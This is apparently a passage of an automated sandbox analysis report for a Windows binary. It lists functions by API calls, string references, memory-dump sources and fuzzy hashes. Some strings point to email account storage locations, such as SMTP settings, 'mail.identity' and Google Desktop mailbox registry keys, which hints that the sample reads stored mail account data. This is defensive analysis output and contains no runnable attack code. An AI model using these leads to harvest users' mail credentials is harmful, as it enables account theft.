• Opcode Fuzzy Hash: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
• Instruction Fuzzy Hash: AAF03135101109BBCF112FA5DC49ADE3F25EF05711F14812AFA25A85F1CBB5A990DF58

APIs
• _strcmpi.MSVCRT ref: 0040E134
• _strcmpi.MSVCRT ref: 0040E14D
• _mbscpy.MSVCRT(?,smtp,0040DE7F,0040DE7F,?,?,00000000,000000FF), ref: 0040E19A
Strings
Memory Dump Source
• Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: _strcmpi$_mbscpy
• String ID: smtp
• API String ID: 2625860049-60245459
• Opcode ID: 407fd4cd9c5cafa87f943c7cdde1874e153e025f22c42b823323a6ce76bf96c9
• Instruction ID: 1dd5f7db1b4edf1a80ad81ce147274c535078e8a2a303909ef95c05f23963bac
• Opcode Fuzzy Hash: 407fd4cd9c5cafa87f943c7cdde1874e153e025f22c42b823323a6ce76bf96c9
• Instruction Fuzzy Hash: DB11C872500219ABEB10AB66CC41A8A7399EF40358F10453BE945F71C2EF39E9698B98
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                                                                                                                                                    • memset.MSVCRT ref: 00408258
                                                                                                                                                                                      • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082A6
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082C3
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • Software\Google\Google Desktop\Mailboxes, xrefs: 00408230
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Close$EnumOpenmemset
                                                                                                                                                                                    • String ID: Software\Google\Google Desktop\Mailboxes
                                                                                                                                                                                    • API String ID: 2255314230-2212045309
                                                                                                                                                                                    • Opcode ID: cc5d6d64aea0813188cde2f76db8480d49896f172f032d850e05fd1d4fe80f83
                                                                                                                                                                                    • Instruction ID: e7ff4aa50d33639bacb2d5000aefce928628a80d8311d3545e17288fa3d3d8ee
                                                                                                                                                                                    • Opcode Fuzzy Hash: cc5d6d64aea0813188cde2f76db8480d49896f172f032d850e05fd1d4fe80f83
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9D118F72408345ABD710EE51DC01EABBBACEFD0344F04093EBD9491091EB75D958C6AA
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0040C28C
                                                                                                                                                                                    • SetFocus.USER32(?,?), ref: 0040C314
                                                                                                                                                                                      • Part of subcall function 0040C256: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040C265
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FocusMessagePostmemset
                                                                                                                                                                                    • String ID: S_@$l
                                                                                                                                                                                    • API String ID: 3436799508-4018740455
                                                                                                                                                                                    • Opcode ID: e2b80c6bc645313a4292a5829f5b0635f9a789c9535e0ddf74fc40c289d6b9ff
                                                                                                                                                                                    • Instruction ID: f4172cee4733ded4edf5c13384372fb960b3a31eee454cf66b40e3553cb76095
                                                                                                                                                                                    • Opcode Fuzzy Hash: e2b80c6bc645313a4292a5829f5b0635f9a789c9535e0ddf74fc40c289d6b9ff
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1411A172900158CBDF219B14CD457DE7BB9AF81308F0800F5E94C7B296C7B45A89CFA9
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _mbscpy
                                                                                                                                                                                    • String ID: C^@$X$ini
                                                                                                                                                                                    • API String ID: 714388716-917056472
                                                                                                                                                                                    • Opcode ID: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                                                                                                                                                    • Instruction ID: 848b4a5d233ab05c703a0d630411b91f0640a461eb42b4d170138ac17b774cf5
                                                                                                                                                                                    • Opcode Fuzzy Hash: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                                                                                                                                                    • Instruction Fuzzy Hash: F601B2B1D002489FDB50DFE9D9856CEBFF4AB08318F10802AE415F6240EB7895458F59
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                                                                                                                                                      • Part of subcall function 00406FC7: _mbscpy.MSVCRT(?,00000000,?,00000000,0000003C,00000000,?,0040709F,Arial,0000000E,00000000), ref: 00407011
                                                                                                                                                                                    • CreateFontIndirectA.GDI32(?), ref: 0040101F
                                                                                                                                                                                    • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                                                                                                                                                                                    • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                                                                                                                                                                                    • String ID: MS Sans Serif
                                                                                                                                                                                    • API String ID: 3492281209-168460110
                                                                                                                                                                                    • Opcode ID: fba1b153f1476fe7d17889d81f23932038493b3a6f8049a49ffc4c2ea38943aa
                                                                                                                                                                                    • Instruction ID: 97d77737ff66efe52178e6fda6de2dc92fca71035f8b3f8e7b76904d62d162b3
                                                                                                                                                                                    • Opcode Fuzzy Hash: fba1b153f1476fe7d17889d81f23932038493b3a6f8049a49ffc4c2ea38943aa
                                                                                                                                                                                    • Instruction Fuzzy Hash: F5F02775A4130477E7317BA0EC47F4A3BACAB41B00F044535F652B50E1D2F4A404CB48
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ClassName_strcmpimemset
                                                                                                                                                                                    • String ID: edit
                                                                                                                                                                                    • API String ID: 275601554-2167791130
                                                                                                                                                                                    • Opcode ID: db8b236e199e929443ba679e8cc25b3238d768833fac675e2ea724ace2b39a9c
                                                                                                                                                                                    • Instruction ID: 4378e7120b76b93f9ba7f3ad81c4d59275eb15acd3879ac3f183c71196eabbb1
                                                                                                                                                                                    • Opcode Fuzzy Hash: db8b236e199e929443ba679e8cc25b3238d768833fac675e2ea724ace2b39a9c
                                                                                                                                                                                    • Instruction Fuzzy Hash: ADE09BB2C4016A6AEB21A664DC01FE5776CDF59704F0400B6B945E2081E6A4A6884A95
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: strlen$_mbscat
                                                                                                                                                                                    • String ID: 3CD
                                                                                                                                                                                    • API String ID: 3951308622-1938365332
                                                                                                                                                                                    • Opcode ID: ea07c3cf78fe23fa274cd57f6e103936ddd3628895d35173825c115ee7dc3945
                                                                                                                                                                                    • Instruction ID: 1107c6f19d6a4433d5fdc1d3c5cfb72f3531f1d81a70b052f8a244d3c085287a
                                                                                                                                                                                    • Opcode Fuzzy Hash: ea07c3cf78fe23fa274cd57f6e103936ddd3628895d35173825c115ee7dc3945
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1BD0A77390C2603AE61566167C42F8E5BC1CFD433AB15081FF408D1281DA3DE881809D
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset
                                                                                                                                                                                    • String ID: rows deleted
                                                                                                                                                                                    • API String ID: 2221118986-571615504
                                                                                                                                                                                    • Opcode ID: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                                                                                                                                                                                    • Instruction ID: 17dfb349c3cd8fc2c2490db290532cf881f14abfa8d6012d9aa572d9710d7201
                                                                                                                                                                                    • Opcode Fuzzy Hash: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                                                                                                                                                                                    • Instruction Fuzzy Hash: D5028171E00218AFDF14DFA5D981AEEBBB5FF08314F14005AF914B7291D7B9AA41CBA4
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 004073B3: memset.MSVCRT ref: 004073C1
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
• ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
• ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
• ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
Memory Dump Source
• Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: ??2@$memset
• String ID:
• API String ID: 1860491036-0
APIs
• memset.MSVCRT ref: 004048C2
• memset.MSVCRT ref: 004048D6
• memset.MSVCRT ref: 004048EA
• memcpy.MSVCRT(?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,?), ref: 004048FC
• memcpy.MSVCRT(?,00406667,?,?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040490E
Memory Dump Source
• Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: memset$memcpy
• String ID:
• API String ID: 368790112-0
APIs
• memset.MSVCRT ref: 0040D2C2
• memset.MSVCRT ref: 0040D2D8
• memset.MSVCRT ref: 0040D2EA
• memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
• memset.MSVCRT ref: 0040D319
Memory Dump Source
• Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: memset$memcpy
• String ID:
• API String ID: 368790112-0
APIs
Strings
• variable number must be between ?1 and ?%d, xrefs: 0042C5C2
• too many SQL variables, xrefs: 0042C6FD
Memory Dump Source
• Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: memset
• String ID: too many SQL variables$variable number must be between ?1 and ?%d
• API String ID: 2221118986-515162456
APIs
  • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 004026E4
• memset.MSVCRT ref: 004026AD
  • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
  • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
  • Part of subcall function 004108E5: memcpy.MSVCRT(?,00000000,?,00000001,?,?,?,00000000), ref: 00410961
  • Part of subcall function 004108E5: CoTaskMemFree.COMBASE(00000000), ref: 00410970
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 0040279C
• LocalFree.KERNEL32(?), ref: 004027A6
Memory Dump Source
• Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: ByteCharFreeFromMultiStringUuidWide$LocalQueryTaskValuememcpymemset
• String ID:
• API String ID: 3503910906-0
APIs
• memset.MSVCRT ref: 0040C922
• SendMessageA.USER32(00000000,00000423,00000000,00000000), ref: 0040C966
• GetMenuStringA.USER32(?,00000103,?,0000004F,00000000), ref: 0040C980
• PostMessageA.USER32(?,00000402,00000000,00000000), ref: 0040CA23
Memory Dump Source
• Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: Message$MenuPostSendStringmemset
• String ID:
• API String ID: 3798638045-0
APIs
  • Part of subcall function 00409DED: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000), ref: 00409E0E
  • Part of subcall function 00409DED: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000), ref: 00409ED5
• strlen.MSVCRT ref: 0040B60B
• atoi.MSVCRT(?,00000000,?,761F0A60,?,00000000), ref: 0040B619
• _mbsicmp.MSVCRT ref: 0040B66C
• _mbsicmp.MSVCRT ref: 0040B67F
Memory Dump Source
• Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: _mbsicmp$??2@??3@atoistrlen
• String ID:
• API String ID: 4107816708-0
APIs
Strings
Memory Dump Source
• Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: strlen
• String ID: >$>$>
• API String ID: 39653677-3911187716
APIs
• memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
• memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
• memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
Strings
Memory Dump Source
• Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpy
                                                                                                                                                                                    • String ID: @
                                                                                                                                                                                    • API String ID: 3510742995-2766056989
                                                                                                                                                                                    • Opcode ID: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                                                                                                                                                    • Instruction ID: 6d1199ef97cb2679a5b3fe4a4c98cea7b7ae300cfbacc21e3dff9814a3884c4c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                                                                                                                                                    • Instruction Fuzzy Hash: 41113DB2E007046BDB288E96DC80D5A77A8EFA0354700013FFE06662D1F639EA5DC7D8
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _strcmpi
                                                                                                                                                                                    • String ID: C@$mail.identity
                                                                                                                                                                                    • API String ID: 1439213657-721921413
                                                                                                                                                                                    • Opcode ID: 7f34e83aea2ba6c2d35b03d1c240e84e4999e9cdc42306934c4a033b456bfb77
                                                                                                                                                                                    • Instruction ID: e081b0b03caa8c584547328dd3c7b46ba64ccdb110812537a35def5e1e6d8c92
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7f34e83aea2ba6c2d35b03d1c240e84e4999e9cdc42306934c4a033b456bfb77
                                                                                                                                                                                    • Instruction Fuzzy Hash: DD110A325002199BEB20AA65DC41E8A739CEF00358F10453FF545B6182EF38F9598B98
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 00406640
                                                                                                                                                                                      • Part of subcall function 004063B2: memset.MSVCRT ref: 0040644F
                                                                                                                                                                                      • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                                                                                                                                                      • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                                                                                                                                                    • memcmp.MSVCRT(?,00456EA0,00000010,?,?,?,00000060,?,?,00000000,00000000), ref: 00406672
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000018,?,00000060,?,?,00000000,00000000), ref: 00406695
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpy$memset$memcmp
                                                                                                                                                                                    • String ID: Ul@
                                                                                                                                                                                    • API String ID: 270934217-715280498
                                                                                                                                                                                    • Opcode ID: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                                                                                                                                                                    • Instruction ID: 50cfa42ee3f36d69bd2a91aaf20a03d2fa08f341615043147a7a382cdea3e611
                                                                                                                                                                                    • Opcode Fuzzy Hash: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 46017572A0020C6BEB10DAA58C06FEF73ADAB44705F450436FE49F2181E679AA1987B5
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,0000000D,?,?), ref: 00408E7F
                                                                                                                                                                                      • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001,?,?,?,?,?,00000000,761F0A60), ref: 00408EBE
                                                                                                                                                                                    • sprintf.MSVCRT ref: 0040B929
                                                                                                                                                                                    • SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B98C
                                                                                                                                                                                      • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,?,00409CE2,?,?,?,?,?,00000000,761F0A60), ref: 00408E31
                                                                                                                                                                                      • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                                                                                                                                    • sprintf.MSVCRT ref: 0040B953
                                                                                                                                                                                    • _mbscat.MSVCRT ref: 0040B966
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: sprintf$LoadMessageSendString_mbscat_mbscpymemcpystrlen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 203655857-0
                                                                                                                                                                                    • Opcode ID: 2ce3bf29076009c9b33a0812678365ae05abee5bebdb1db4c2a4298f5e83ad1b
                                                                                                                                                                                    • Instruction ID: 0d6227c2dffbdb2154d3321facad49e181a647ebd34d8d5e6c5aab0b846496ed
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2ce3bf29076009c9b33a0812678365ae05abee5bebdb1db4c2a4298f5e83ad1b
                                                                                                                                                                                    • Instruction Fuzzy Hash: EE0117B2500308A6E721EB75DC87FE773ACAB54704F04046AB659B61C3DA78E5444A59
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _ultoasprintf
                                                                                                                                                                                    • String ID: %s %s %s
                                                                                                                                                                                    • API String ID: 432394123-3850900253
                                                                                                                                                                                    • Opcode ID: 314d7e330c7070d124fa50e0e353eda456261e74e4a8aa7da6b91d27fde07fbe
                                                                                                                                                                                    • Instruction ID: 5b4e28b1b4fc8494891684f3550fd3cb18a3cec27640a2844273e51cea36df92
                                                                                                                                                                                    • Opcode Fuzzy Hash: 314d7e330c7070d124fa50e0e353eda456261e74e4a8aa7da6b91d27fde07fbe
                                                                                                                                                                                    • Instruction Fuzzy Hash: 80412331504A15C7C93595648B8DBEBA3A8BB46300F5804BFDCAAB32C0D3FCAD42865E
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • LoadMenuA.USER32(00000000), ref: 00409078
                                                                                                                                                                                    • sprintf.MSVCRT ref: 0040909B
                                                                                                                                                                                      • Part of subcall function 00408F1B: GetMenuItemCount.USER32(?), ref: 00408F31
                                                                                                                                                                                      • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408F55
                                                                                                                                                                                      • Part of subcall function 00408F1B: GetMenuItemInfoA.USER32(?), ref: 00408F8B
                                                                                                                                                                                      • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408FB8
                                                                                                                                                                                      • Part of subcall function 00408F1B: strchr.MSVCRT ref: 00408FC4
                                                                                                                                                                                      • Part of subcall function 00408F1B: _mbscat.MSVCRT ref: 0040901F
                                                                                                                                                                                      • Part of subcall function 00408F1B: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 0040903B
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                                                                                                                                                                                    • String ID: menu_%d
                                                                                                                                                                                    • API String ID: 1129539653-2417748251
                                                                                                                                                                                    • Opcode ID: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                                                                                                                                                    • Instruction ID: bbc3668ae8aad1463aedfde5e5dd5b48340f77aa4c3989790123ead7330def9b
                                                                                                                                                                                    • Opcode Fuzzy Hash: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2ED0C260A4124036EA2023366C0AF4B1A099BC271AF14022EF000B20C3EBFC844482BE
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • failed memory resize %u to %u bytes, xrefs: 00411706
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _msizerealloc
                                                                                                                                                                                    • String ID: failed memory resize %u to %u bytes
                                                                                                                                                                                    • API String ID: 2713192863-2134078882
                                                                                                                                                                                    • Opcode ID: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                                                                                                                                                                                    • Instruction ID: 6d708a2afe7937de994116278d2c06faa365a3e4d7322368aba5da3f7b150b0b
                                                                                                                                                                                    • Opcode Fuzzy Hash: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                                                                                                                                                                                    • Instruction Fuzzy Hash: DBD0C2329092107EEB152250AC03B5FAB51DB80374F25850FF658451A1E6795C108389
APIs
